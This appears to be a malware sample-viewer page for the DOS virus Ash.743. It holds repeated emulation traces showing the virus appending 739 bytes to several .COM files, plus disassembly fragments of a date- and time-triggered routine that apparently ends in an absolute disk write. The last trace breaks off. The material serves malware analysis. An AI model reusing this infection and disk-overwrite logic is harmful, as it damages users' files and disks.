Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:29.720456195Z 26 PC: 12aa5 | Set disk transfer address
2018-12-17T23:11:29.722200075Z 78 PC: 12afb | Find first file
2018-12-17T23:11:29.730234135Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:29.737773094Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:29.745079065Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:11:29.748758785Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.752481276Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-17T23:11:29.768063702Z 66 PC: 12b55 | Move file pointer
2018-12-17T23:11:29.770441394Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.781564985Z 62 PC: 12aef | Close file
2018-12-17T23:11:29.790743738Z 79 PC: 12afb | Find next file
2018-12-17T23:11:29.794690902Z 61 PC: 12b07 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:11:29.80316015Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:29.810723905Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:11:29.812861496Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.817189626Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-17T23:11:29.825948138Z 66 PC: 12b55 | Move file pointer
2018-12-17T23:11:29.827806062Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.836134246Z 62 PC: 12aef | Close file
2018-12-17T23:11:29.846208233Z 79 PC: 12afb | Find next file
2018-12-17T23:11:29.849648212Z 61 PC: 12b07 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:11:29.858435869Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:29.865670206Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:11:29.867480109Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.87143664Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-17T23:11:29.880212396Z 66 PC: 12b55 | Move file pointer
2018-12-17T23:11:29.881888478Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.88964157Z 62 PC: 12aef | Close file
2018-12-17T23:11:29.898634483Z 79 PC: 12afb | Find next file
2018-12-17T23:11:29.901955038Z 61 PC: 12b07 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:11:29.910491443Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:29.918253211Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:11:29.92026265Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.924621337Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-17T23:11:29.933494476Z 66 PC: 12b55 | Move file pointer
2018-12-17T23:11:29.935919947Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.944316358Z 62 PC: 12aef | Close file
2018-12-17T23:11:29.953555485Z 79 PC: 12afb | Find next file
2018-12-17T23:11:29.956653071Z 61 PC: 12b07 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:11:29.963787119Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:29.979727869Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:11:29.981499831Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:29.984895077Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-17T23:11:29.995072538Z 66 PC: 12b55 | Move file pointer
2018-12-17T23:11:29.997531192Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:30.005429187Z 62 PC: 12aef | Close file
2018-12-17T23:11:30.015294109Z 79 PC: 12afb | Find next file
2018-12-17T23:11:30.018774535Z 61 PC: 12b07 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:11:30.025794458Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:30.033751713Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:11:30.035481006Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:30.038522056Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-17T23:11:30.04850461Z 66 PC: 12b55 | Move file pointer
2018-12-17T23:11:30.051668991Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:30.060517864Z 62 PC: 12aef | Close file
2018-12-17T23:11:30.069822043Z 79 PC: 12afb | Find next file
2018-12-17T23:11:30.07393066Z 61 PC: 12b07 | Open file (Filename = 'PAH.COM')
2018-12-17T23:11:30.081234276Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:30.088460527Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:11:30.091532163Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:30.094807624Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-17T23:11:30.103590011Z 66 PC: 12b55 | Move file pointer
2018-12-17T23:11:30.106214377Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:30.11395793Z 62 PC: 12aef | Close file
2018-12-17T23:11:30.123591559Z 79 PC: 12afb | Find next file
2018-12-17T23:11:30.131432826Z 61 PC: 12b07 | Open file (Filename = 'TEST.COM')
2018-12-17T23:11:30.140146424Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:30.143397268Z 62 PC: 12aef | Close file
2018-12-17T23:11:30.145841385Z 79 PC: 12afb | Find next file
2018-12-17T23:11:30.150159917Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-17T23:11:30.153097792Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-17T23:11:30.156056567Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-17T23:11:30.159589802Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-17T23:11:30.165087171Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:14.894614962Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:14.896042117Z 78 PC: 12afb | Find first file
2018-12-25T12:55:14.902023553Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:14.908391785Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:14.915055199Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:14.91643098Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:14.919005489Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:14.934211156Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:14.935511136Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:14.942099265Z 62 PC: 12aef | Close file
2018-12-25T12:55:14.950499914Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:14.953367114Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:14.960010228Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:14.96700899Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:14.968665357Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:14.971225131Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:14.97892634Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:14.981245344Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:14.987798256Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:14.99567885Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:14.998924281Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.005736239Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.011751545Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.013859568Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.016284381Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.023814159Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.025685435Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.032095465Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.040513574Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.043114104Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.05532348Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.059227384Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.06051198Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.063465404Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.070986946Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.072168025Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.079247916Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.087177635Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.089553447Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.096386886Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.102348536Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.103419414Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.106251911Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.114038313Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.115399213Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.126587528Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.134393742Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.136786474Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.144057618Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.150037001Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.151241602Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.154423879Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.162600356Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.163788234Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.170528033Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.179352134Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.182243438Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.189724179Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.196051569Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.197351801Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.200353Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.208420999Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.209626901Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.21646885Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.224376985Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.226788159Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.240340481Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.242807822Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.24450701Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.247381562Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:15.249390377Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:15.251387941Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T12:55:15.253996735Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T12:55:15.25887039Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:15.280806457Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:15.282182177Z 78 PC: 12afb | Find first file
2018-12-25T12:55:15.287921023Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:15.294122394Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:15.300593711Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:15.30184925Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.304263943Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:15.319626982Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:15.32168728Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.327901444Z 62 PC: 12aef | Close file
2018-12-25T12:55:15.335676684Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.338366807Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.344502337Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.350478455Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.352093265Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.354549292Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.362250417Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.364067549Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.370328709Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.37825743Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.380878484Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.385372931Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.38957643Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.391201914Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.392928321Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.397833503Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.407343175Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.411311778Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.416561435Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.418687848Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.422615257Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.426539558Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.428116753Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.430379465Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.436711264Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.438494054Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.445532224Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.454097036Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.457187854Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.463402451Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.470277732Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.471756063Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.474158727Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.482002696Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.483256212Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.48951932Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.497494076Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.499914629Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.50612155Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.522805311Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.524022079Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.526435874Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.53528231Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.536476791Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.542806874Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.550720088Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.55308487Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.559310444Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.565717855Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.567267228Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.570058066Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.589830591Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.592093129Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.598514694Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.607506962Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.610171202Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.616767578Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.620483283Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.622493713Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.625101254Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:15.628297194Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:15.630837975Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T12:55:15.632770543Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T12:55:15.638218735Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:15.437683837Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:15.444452382Z 78 PC: 12afb | Find first file
2018-12-25T12:55:15.451191427Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:15.458485362Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:15.466127732Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:15.467753645Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.470618069Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:15.486429412Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:15.48829522Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:15.496033112Z 62 PC: 12aef | Close file
2018-12-25T12:55:15.505566374Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.509507659Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.517411258Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.525442881Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.527807485Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.531184996Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.541337956Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.543340516Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.551264087Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.561428804Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.565130645Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.57263884Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.580053526Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.582280288Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.586496293Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.595793122Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.597810063Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.607269582Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.617136835Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.620118716Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.630818002Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.640153539Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.642535239Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.646291999Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.655395901Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.657264052Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.665263996Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.674375928Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.677492348Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.686685458Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.694455143Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.70060597Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.704110529Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.714282267Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.715924299Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.723073492Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.733012409Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.736239975Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.743580126Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.751815992Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.753328448Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.756583405Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.766913721Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.768494842Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.77538447Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.784646189Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.787439977Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.794324446Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.800950255Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:15.802346917Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:15.805365557Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:15.814244662Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:15.816525224Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:15.823501474Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.832501988Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.83507716Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:15.842038562Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:15.844736366Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:15.848288097Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:15.850882012Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
